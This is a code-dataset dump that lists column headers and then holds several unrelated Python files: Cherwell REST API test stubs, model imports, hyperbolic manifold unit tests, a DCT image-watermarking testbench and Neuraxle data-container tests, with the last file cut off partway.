hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e7bb62672ed73a53907db64cef01c081241737e4
| 11,189
|
py
|
Python
|
test/test_business_object_api.py
|
greenpau/pycherwell
|
2a25446d5cf86d69e6158067faf27ce250aba966
|
[
"Apache-2.0"
] | 2
|
2020-04-09T16:41:25.000Z
|
2020-08-25T21:07:53.000Z
|
test/test_business_object_api.py
|
greenpau/pycherwell
|
2a25446d5cf86d69e6158067faf27ce250aba966
|
[
"Apache-2.0"
] | 15
|
2020-02-12T14:57:30.000Z
|
2020-11-27T23:34:15.000Z
|
test/test_business_object_api.py
|
greenpau/pycherwell
|
2a25446d5cf86d69e6158067faf27ce250aba966
|
[
"Apache-2.0"
] | 2
|
2020-02-12T14:57:38.000Z
|
2021-07-30T11:32:28.000Z
|
# coding: utf-8
"""
Cherwell REST API
Unofficial Python Cherwell REST API library. # noqa: E501
The version of the OpenAPI document: 9.3.2
Contact: See AUTHORS.
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import pycherwell
from pycherwell.api.business_object_api import BusinessObjectApi # noqa: E501
from pycherwell.rest import ApiException
class TestBusinessObjectApi(unittest.TestCase):
"""BusinessObjectApi unit test stubs"""
def setUp(self):
self.api = pycherwell.api.business_object_api.BusinessObjectApi() # noqa: E501
def tearDown(self):
pass
def test_business_object_delete_business_object_batch_v1(self):
"""Test case for business_object_delete_business_object_batch_v1
Delete Business Objects in a batch # noqa: E501
"""
pass
def test_business_object_delete_business_object_by_public_id_v1(self):
"""Test case for business_object_delete_business_object_by_public_id_v1
Delete a Business Object by public ID # noqa: E501
"""
pass
def test_business_object_delete_business_object_by_rec_id_v1(self):
"""Test case for business_object_delete_business_object_by_rec_id_v1
Delete a Business Object by record ID # noqa: E501
"""
pass
def test_business_object_delete_related_business_object_by_public_id_v1(self):
"""Test case for business_object_delete_related_business_object_by_public_id_v1
Delete a related Business Object by public ID # noqa: E501
"""
pass
def test_business_object_delete_related_business_object_by_rec_id_v1(self):
"""Test case for business_object_delete_related_business_object_by_rec_id_v1
Delete a related Business Object by record ID # noqa: E501
"""
pass
def test_business_object_field_values_lookup_v1(self):
"""Test case for business_object_field_values_lookup_v1
Get lookup values for fields # noqa: E501
"""
pass
def test_business_object_get_business_object_attachment_by_attachment_id_v1(self):
"""Test case for business_object_get_business_object_attachment_by_attachment_id_v1
Get an imported Business Object attachment # noqa: E501
"""
pass
def test_business_object_get_business_object_attachments_by_id_and_public_id_v1(self):
"""Test case for business_object_get_business_object_attachments_by_id_and_public_id_v1
Get attachments by Business Object public ID # noqa: E501
"""
pass
def test_business_object_get_business_object_attachments_by_id_and_rec_id_v1(self):
"""Test case for business_object_get_business_object_attachments_by_id_and_rec_id_v1
Get attachments by Business Object record ID # noqa: E501
"""
pass
def test_business_object_get_business_object_attachments_by_name_and_public_id_v1(self):
"""Test case for business_object_get_business_object_attachments_by_name_and_public_id_v1
Get attachments by Business Object name and public ID # noqa: E501
"""
pass
def test_business_object_get_business_object_attachments_by_name_and_rec_id_v1(self):
"""Test case for business_object_get_business_object_attachments_by_name_and_rec_id_v1
Get attachments by Business Object name and record ID # noqa: E501
"""
pass
def test_business_object_get_business_object_attachments_v1(self):
"""Test case for business_object_get_business_object_attachments_v1
Get Business Object attachments by request object # noqa: E501
"""
pass
def test_business_object_get_business_object_batch_v1(self):
"""Test case for business_object_get_business_object_batch_v1
Get a batch of Business Object records # noqa: E501
"""
pass
def test_business_object_get_business_object_by_public_id_v1(self):
"""Test case for business_object_get_business_object_by_public_id_v1
Get a Business Object record # noqa: E501
"""
pass
def test_business_object_get_business_object_by_rec_id_v1(self):
"""Test case for business_object_get_business_object_by_rec_id_v1
Get a Business Object record # noqa: E501
"""
pass
def test_business_object_get_business_object_by_scan_code_bus_ob_id_v1(self):
"""Test case for business_object_get_business_object_by_scan_code_bus_ob_id_v1
Get a Business Object by its scan code and Business Object ID # noqa: E501
"""
pass
def test_business_object_get_business_object_by_scan_code_bus_ob_name_v1(self):
"""Test case for business_object_get_business_object_by_scan_code_bus_ob_name_v1
Get a Business Object by its scan code and Business Object name # noqa: E501
"""
pass
def test_business_object_get_business_object_schema_v1(self):
"""Test case for business_object_get_business_object_schema_v1
Get a Business Object schema # noqa: E501
"""
pass
def test_business_object_get_business_object_summaries_v1(self):
"""Test case for business_object_get_business_object_summaries_v1
Get Business Object summaries by type # noqa: E501
"""
pass
def test_business_object_get_business_object_summary_by_id_v1(self):
"""Test case for business_object_get_business_object_summary_by_id_v1
Get a Business Object summary by ID # noqa: E501
"""
pass
def test_business_object_get_business_object_summary_by_name_v1(self):
"""Test case for business_object_get_business_object_summary_by_name_v1
Get a Business Object summary by name # noqa: E501
"""
pass
def test_business_object_get_business_object_template_v1(self):
"""Test case for business_object_get_business_object_template_v1
Get Business Object templates for create # noqa: E501
"""
pass
def test_business_object_get_related_business_object_by_request_v1(self):
"""Test case for business_object_get_related_business_object_by_request_v1
Get related Business Objects using a request object # noqa: E501
"""
pass
def test_business_object_get_related_business_object_v1(self):
"""Test case for business_object_get_related_business_object_v1
Get related Business Objects by ID # noqa: E501
"""
pass
def test_business_object_get_related_business_object_with_custom_grid_v1(self):
"""Test case for business_object_get_related_business_object_with_custom_grid_v1
Get related Business Objects custom grid # noqa: E501
"""
pass
def test_business_object_link_related_business_object_by_rec_id_v1(self):
"""Test case for business_object_link_related_business_object_by_rec_id_v1
Link related Business Objects # noqa: E501
"""
pass
def test_business_object_remove_business_object_attachment_by_id_and_public_id_v1(self):
"""Test case for business_object_remove_business_object_attachment_by_id_and_public_id_v1
Remove an attachment by Business Object ID and public ID # noqa: E501
"""
pass
def test_business_object_remove_business_object_attachment_by_id_and_rec_id_v1(self):
"""Test case for business_object_remove_business_object_attachment_by_id_and_rec_id_v1
Remove an attachment by Business Object ID and record ID # noqa: E501
"""
pass
def test_business_object_remove_business_object_attachment_by_name_and_public_id_v1(self):
"""Test case for business_object_remove_business_object_attachment_by_name_and_public_id_v1
Remove an attachment by Business Object name and public ID # noqa: E501
"""
pass
def test_business_object_remove_business_object_attachment_by_name_and_rec_id_v1(self):
"""Test case for business_object_remove_business_object_attachment_by_name_and_rec_id_v1
Remove an attachment by Business Object name and record ID # noqa: E501
"""
pass
def test_business_object_save_business_object_attachment_bus_ob_v1(self):
"""Test case for business_object_save_business_object_attachment_bus_ob_v1
Attach a Business Object to a Business Object # noqa: E501
"""
pass
def test_business_object_save_business_object_attachment_link_v1(self):
"""Test case for business_object_save_business_object_attachment_link_v1
Attach a file via UNC # noqa: E501
"""
pass
def test_business_object_save_business_object_attachment_url_v1(self):
"""Test case for business_object_save_business_object_attachment_url_v1
Attach a URL path # noqa: E501
"""
pass
def test_business_object_save_business_object_batch_v1(self):
"""Test case for business_object_save_business_object_batch_v1
Create or update a batch of Business Objects # noqa: E501
"""
pass
def test_business_object_save_business_object_v1(self):
"""Test case for business_object_save_business_object_v1
Create or Update a Business Object # noqa: E501
"""
pass
def test_business_object_save_related_business_object_v1(self):
"""Test case for business_object_save_related_business_object_v1
Create or update a related Business Object # noqa: E501
"""
pass
def test_business_object_un_link_related_business_object_by_rec_id_v1(self):
"""Test case for business_object_un_link_related_business_object_by_rec_id_v1
UnLink related Business Objects # noqa: E501
"""
pass
def test_business_object_upload_business_object_attachment_by_id_and_public_id_v1(self):
"""Test case for business_object_upload_business_object_attachment_by_id_and_public_id_v1
Upload an attachment by Business Object ID and public ID # noqa: E501
"""
pass
def test_business_object_upload_business_object_attachment_by_id_and_rec_id_v1(self):
"""Test case for business_object_upload_business_object_attachment_by_id_and_rec_id_v1
Upload an attachment by Business Object ID and record ID # noqa: E501
"""
pass
def test_business_object_upload_business_object_attachment_by_name_and_public_id_v1(self):
"""Test case for business_object_upload_business_object_attachment_by_name_and_public_id_v1
Upload an attachment by Business Object name and public ID # noqa: E501
"""
pass
def test_business_object_upload_business_object_attachment_by_name_and_rec_id_v1(self):
"""Test case for business_object_upload_business_object_attachment_by_name_and_rec_id_v1
Upload an attachment by Business Object name and record ID # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 34.748447
| 99
| 0.731433
| 1,543
| 11,189
| 4.811406
| 0.069345
| 0.373384
| 0.060749
| 0.10493
| 0.90167
| 0.875
| 0.870151
| 0.838766
| 0.826509
| 0.79903
| 0
| 0.025069
| 0.222808
| 11,189
| 321
| 100
| 34.856698
| 0.828657
| 0.50496
| 0
| 0.446809
| 1
| 0
| 0.001738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.457447
| false
| 0.446809
| 0.053191
| 0
| 0.521277
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 11
|
99ba17b97afc76dc977d3515a7638e668b4bc27a
| 187
|
py
|
Python
|
app/group/models/__init__.py
|
TIHLDE/Lepton
|
60ec0793381f1c1b222f305586e8c2d4345fb566
|
[
"MIT"
] | 7
|
2021-03-04T18:49:12.000Z
|
2021-03-08T18:25:51.000Z
|
app/group/models/__init__.py
|
TIHLDE/Lepton
|
60ec0793381f1c1b222f305586e8c2d4345fb566
|
[
"MIT"
] | 251
|
2021-03-04T19:19:14.000Z
|
2022-03-31T14:47:53.000Z
|
app/group/models/__init__.py
|
tihlde/Lepton
|
5cab3522c421b76373a5c25f49267cfaef7b826a
|
[
"MIT"
] | 3
|
2021-10-05T19:03:04.000Z
|
2022-02-25T13:32:09.000Z
|
from app.group.models.group import Group
from app.group.models.membership import Membership, MembershipHistory
from app.group.models.law import Law
from app.group.models.fine import Fine
| 37.4
| 69
| 0.839572
| 29
| 187
| 5.413793
| 0.310345
| 0.178344
| 0.305732
| 0.458599
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 187
| 4
| 70
| 46.75
| 0.923529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
82154a8b0bceed1ed2ea89139c3951736c01cd3e
| 7,939
|
py
|
Python
|
tests/test_manifolds/test_hyperbolic.py
|
lrozo/pymanopt
|
cbc2bc691fdcb2b2e59ef721404ed7c25c651a29
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_manifolds/test_hyperbolic.py
|
lrozo/pymanopt
|
cbc2bc691fdcb2b2e59ef721404ed7c25c651a29
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_manifolds/test_hyperbolic.py
|
lrozo/pymanopt
|
cbc2bc691fdcb2b2e59ef721404ed7c25c651a29
|
[
"BSD-3-Clause"
] | null | null | null |
import autograd.numpy as np
from numpy import linalg as la, testing as np_testing
from pymanopt.manifolds import PoincareBall
from .._test import TestCase
class TestSinglePoincareBallManifold(TestCase):
def setUp(self):
self.k = 50
self.man = PoincareBall(self.k)
def test_dim(self):
assert self.man.dim == self.k
# def test_typicaldist(self):
# pass
def test_conformal_factor(self):
x = self.man.rand() / 2
np_testing.assert_allclose(
1 - 2 / self.man.conformal_factor(x), la.norm(x) ** 2
)
def test_inner(self):
x = self.man.rand() / 2
u = self.man.randvec(x)
v = self.man.randvec(x)
np_testing.assert_allclose(
(2 / (1 - la.norm(x) ** 2)) ** 2 * np.inner(u, v),
self.man.inner(x, u, v),
)
# test that angles are preserved
x = self.man.rand() / 2
u = self.man.randvec(x)
v = self.man.randvec(x)
cos_eangle = np.sum(u * v) / la.norm(u) / la.norm(v)
cos_rangle = (
self.man.inner(x, u, v) / self.man.norm(x, u) / self.man.norm(x, v)
)
np_testing.assert_allclose(cos_rangle, cos_eangle)
def test_proj(self):
x = self.man.rand()
u = self.man.randvec(x)
np_testing.assert_allclose(u, self.man.proj(x, u))
def test_norm(self):
x = self.man.rand() / 2
u = self.man.randvec(x)
np_testing.assert_allclose(
2 / (1 - la.norm(x) ** 2) * la.norm(u), self.man.norm(x, u)
)
def test_rand(self):
# Just make sure that things generated are on the manifold and that
# if you generate two they are not equal.
x = self.man.rand()
np_testing.assert_array_less(la.norm(x), 1)
y = self.man.rand()
assert not np.array_equal(x, y)
def test_randvec(self):
# Just make sure that things generated are in the tangent space and
# that if you generate two they are not equal.
x = self.man.rand()
u = self.man.randvec(x)
v = self.man.randvec(x)
assert not np.array_equal(u, v)
def test_zerovec(self):
x = self.man.rand()
u = self.man.zerovec(x)
np_testing.assert_allclose(la.norm(u), 0)
def test_dist(self):
x = self.man.rand() / 2
y = self.man.rand() / 2
correct_dist = np.arccosh(
1
+ 2
* la.norm(x - y) ** 2
/ (1 - la.norm(x) ** 2)
/ (1 - la.norm(y) ** 2)
)
np_testing.assert_allclose(correct_dist, self.man.dist(x, y))
# def test_egrad2rgrad(self):
# pass
# def test_ehess2rhess(self):
# pass
def test_retr(self):
x = self.man.rand() / 2
u = self.man.randvec(x)
y = self.man.retr(x, u)
assert la.norm(y) <= 1 + 1e-10
def test_mobius_addition(self):
# test if Mobius addition is closed in the Poincare ball
x = self.man.rand() / 2
y = self.man.rand() / 2
z = self.man.mobius_addition(x, y)
# The norm of z may be slightly more than one because of
# round-off errors.
assert la.norm(z) <= 1 + 1e-10
def test_exp_log_inverse(self):
x = self.man.rand() / 2
y = self.man.rand() / 2
explog = self.man.exp(x, self.man.log(x, y))
np_testing.assert_allclose(y, explog)
def test_log_exp_inverse(self):
x = self.man.rand() / 2
# If u is too big its exponential will have norm 1 because of
# numerical approximations
u = self.man.randvec(x) / self.man.dim
logexp = self.man.log(x, self.man.exp(x, u))
np_testing.assert_allclose(u, logexp)
# def test_transp(self):
# pass
def test_pairmean(self):
x = self.man.rand() / 2
y = self.man.rand() / 2
z = self.man.pairmean(x, y)
np_testing.assert_allclose(self.man.dist(x, z), self.man.dist(y, z))
class TestMultiplePoincareBallManifold(TestCase):
def setUp(self):
self.k = 50
self.n = 20
self.man = PoincareBall(self.k, self.n)
def test_dim(self):
assert self.man.dim == self.k * self.n
# def test_typicaldist(self):
# pass
def test_conformal_factor(self):
x = self.man.rand() / 2
np_testing.assert_allclose(
1 - 2 / self.man.conformal_factor(x), la.norm(x, axis=0) ** 2
)
def test_inner(self):
x = self.man.rand() / 2
u = self.man.randvec(x)
v = self.man.randvec(x)
np_testing.assert_allclose(
np.sum(
(2 / (1 - la.norm(x, axis=0) ** 2)) ** 2
* np.sum(u * v, axis=0)
),
self.man.inner(x, u, v),
)
def test_proj(self):
x = self.man.rand()
u = self.man.randvec(x)
np_testing.assert_allclose(u, self.man.proj(x, u))
def test_norm(self):
# Divide by 2 to avoid round-off errors.
x = self.man.rand() / 2
u = self.man.randvec(x)
np_testing.assert_allclose(
np.sum(
(2 / (1 - la.norm(x, axis=0) ** 2)) ** 2
* np.sum(u * u, axis=0)
),
self.man.norm(x, u) ** 2,
)
def test_rand(self):
# Just make sure that things generated are on the manifold and that
# if you generate two they are not equal.
x = self.man.rand()
np_testing.assert_array_less(la.norm(x, axis=0), 1)
y = self.man.rand()
assert not np.array_equal(x, y)
def test_randvec(self):
# Just make sure that things generated are in the tangent space and
# that if you generate two they are not equal.
x = self.man.rand()
u = self.man.randvec(x)
v = self.man.randvec(x)
assert not np.array_equal(u, v)
def test_zerovec(self):
x = self.man.rand()
u = self.man.zerovec(x)
np_testing.assert_allclose(la.norm(u), 0)
def test_dist(self):
x = self.man.rand() / 2
y = self.man.rand() / 2
correct_dist = np.sum(
np.arccosh(
1
+ 2
* la.norm(x - y, axis=0) ** 2
/ (1 - la.norm(x, axis=0) ** 2)
/ (1 - la.norm(y, axis=0) ** 2)
)
** 2
)
np_testing.assert_allclose(correct_dist, self.man.dist(x, y) ** 2)
# def test_egrad2rgrad(self):
# pass
# def test_ehess2rhess(self):
# pass
def test_retr(self):
x = self.man.rand() / 2
u = self.man.randvec(x)
y = self.man.retr(x, u)
np_testing.assert_array_less(la.norm(y, axis=0), 1 + 1e-10)
def test_mobius_addition(self):
# test if Mobius addition is closed in the Poincare ball
x = self.man.rand()
y = self.man.rand()
z = self.man.mobius_addition(x, y)
# The norm of z may be slightly more than one because of
# round-off errors.
np_testing.assert_array_less(la.norm(z, axis=0), 1 + 1e-10)
def test_exp_log_inverse(self):
x = self.man.rand() / 2
y = self.man.rand() / 2
explog = self.man.exp(x, self.man.log(x, y))
np_testing.assert_allclose(y, explog)
def test_log_exp_inverse(self):
x = self.man.rand() / 2
# If u is too big its exponential will have norm 1 because of
# numerical approximations
u = self.man.randvec(x) / self.man.dim
logexp = self.man.log(x, self.man.exp(x, u))
np_testing.assert_allclose(u, logexp)
# def test_transp(self):
# pass
def test_pairmean(self):
x = self.man.rand() / 2
y = self.man.rand() / 2
z = self.man.pairmean(x, y)
np_testing.assert_allclose(self.man.dist(x, z), self.man.dist(y, z))
| 30.186312
| 79
| 0.543393
| 1,180
| 7,939
| 3.557627
| 0.101695
| 0.156741
| 0.096951
| 0.07718
| 0.902096
| 0.875417
| 0.854693
| 0.838018
| 0.811101
| 0.811101
| 0
| 0.020037
| 0.327371
| 7,939
| 263
| 80
| 30.186312
| 0.766105
| 0.153042
| 0
| 0.712707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171271
| 1
| 0.165746
| false
| 0
| 0.022099
| 0
| 0.198895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
821f737d3fbdf7ef6cde1347eee5fe67e3c2b380
| 2,811
|
py
|
Python
|
testbench_dct.py
|
BillAivaliot/CorrelationBasedWatermarking
|
baceeaf8910ff7d3a8adb8d8d1d61047d8bb153a
|
[
"CC0-1.0"
] | null | null | null |
testbench_dct.py
|
BillAivaliot/CorrelationBasedWatermarking
|
baceeaf8910ff7d3a8adb8d8d1d61047d8bb153a
|
[
"CC0-1.0"
] | null | null | null |
testbench_dct.py
|
BillAivaliot/CorrelationBasedWatermarking
|
baceeaf8910ff7d3a8adb8d8d1d61047d8bb153a
|
[
"CC0-1.0"
] | null | null | null |
import numpy
import scipy
import cv2
import wm_dct
import wm_dct_s
a=cv2.imread("flower.png",0)
wm=wm_dct.generate_watermark(a,10)
noise=numpy.random.normal(loc=0,scale=0,size=(numpy.shape(a)))
wmd_image=wm_dct.add_watermark(a,wm,77686745,0)+noise
wmd2=wmd_image[0:200,20:210]
wmd3=cv2.resize(wmd_image,(numpy.uint8(0.5*numpy.shape(wmd_image)[0]),numpy.uint8(0.5*numpy.shape(wmd_image)[1])))
cv2.imwrite("flowe_watermarked_dct.png",wmd_image)
cv2.imwrite("difference_dct.png",wmd_image-a)
print("START testing WMD1")
wm_found=wm_dct.check_watermark(wmd_image,wm,77686745,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686746,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686747,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686744,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686743,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686748,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686749,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686740,0,0.15)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd_image,wm,77686715,0,0.15)
print(wm_found)
print("FINISHED testing WMD1")
print("START testing WMD2")
#wm_found=wm_dct_s.check_watermark(wmd2,wm,77686745,0,0.1)
#print(wm_found)
#wm_found=wm_dct_s.check_watermark(wmd2,wm,77686746,0,0.1)
#print(wm_found)
#wm_found=wm_dct_s.check_watermark(wmd2,wm,77686747,0,0.1)
#print(wm_found)
#wm_found=wm_dct_s.check_watermark(wmd2,wm,77686744,0,0.1)
#print(wm_found)
#wm_found=wm_dct.check_watermark(wmd2,wm,77686743,0,0.1)
#print(wm_found)
#wm_found=wm_dct.check_watermark(wmd2,wm,77686748,0,0.1)
#print(wm_found)
#wm_found=wm_dct.check_watermark(wmd2,wm,77686749,0,0.1)
#print(wm_found)
#wm_found=wm_dct.check_watermark(wmd2,wm,77686740,0,0.1)
#print(wm_found)
#wm_found=wm_dct.check_watermark(wmd2,wm,77686715,0,0.1)
#print(wm_found)
print("FINISHED testing WMD2")
print("START testing WMD3")
wm_found=wm_dct.check_watermark(wmd3,wm,77686745,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686746,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686747,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686744,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686743,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686748,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686749,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686740,0,0.1)
print(wm_found)
wm_found=wm_dct.check_watermark(wmd3,wm,77686715,0,0.1)
print(wm_found)
print("FINISHED testing WMD3")
#cv2.imwrite("flowerdif.png",c-a)
#cv2.imwrite("flowerdifdct.png",wm_dct.dct2(c-a))
| 24.876106
| 114
| 0.795802
| 552
| 2,811
| 3.800725
| 0.106884
| 0.180172
| 0.21878
| 0.154433
| 0.754051
| 0.754051
| 0.736892
| 0.736892
| 0.693994
| 0.662059
| 0
| 0.13833
| 0.045891
| 2,811
| 112
| 115
| 25.098214
| 0.643922
| 0.255425
| 0
| 0.327273
| 1
| 0
| 0.082007
| 0.01206
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.436364
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
413177e323621d00af5477dc29ad6422bc1a7adf
| 3,372
|
py
|
Python
|
testing/test_zip_data_container.py
|
Kimoby/Neuraxle
|
af96f79d4f770f50174e2edf40da4147cdb8a5b5
|
[
"Apache-2.0"
] | null | null | null |
testing/test_zip_data_container.py
|
Kimoby/Neuraxle
|
af96f79d4f770f50174e2edf40da4147cdb8a5b5
|
[
"Apache-2.0"
] | null | null | null |
testing/test_zip_data_container.py
|
Kimoby/Neuraxle
|
af96f79d4f770f50174e2edf40da4147cdb8a5b5
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from neuraxle.data_container import ZipDataContainer, DACT
def test_zip_data_container_should_merge_two_data_sources_together():
data_inputs_3d, expected_outputs_3d = _create_data_source((10, 10, 2))
data_inputs_2d, expected_outputs_2d = _create_data_source((10, 10))
data_container_2d = DACT(data_inputs=data_inputs_2d, expected_outputs=expected_outputs_2d)
data_container = DACT(data_inputs=data_inputs_3d, expected_outputs=expected_outputs_3d)
zip_data_container = ZipDataContainer.create_from(data_container, data_container_2d)
assert zip_data_container.ids == data_container.ids
for i, di in enumerate(zip_data_container.data_inputs):
assert np.array_equal(di[0], data_inputs_3d[i])
assert np.array_equal(di[1], data_inputs_2d[i])
def test_zip_data_container_should_merge_1d_with_2d():
data_inputs_3d, expected_outputs_3d = _create_data_source((10, 10, 2))
data_inputs_1d, expected_outputs_1d = _create_data_source((10,))
data_container_1d = DACT(data_inputs=data_inputs_1d, expected_outputs=expected_outputs_1d)
data_container = DACT(data_inputs=data_inputs_3d, expected_outputs=expected_outputs_3d)
zip_data_container = ZipDataContainer.create_from(data_container, data_container_1d)
assert zip_data_container.ids == data_container.ids
for i, di in enumerate(zip_data_container.data_inputs):
assert np.array_equal(di[0], data_inputs_3d[i])
assert np.array_equal(di[1], data_inputs_1d[i])
def test_zip_data_container_should_merge_multiple_data_sources_together():
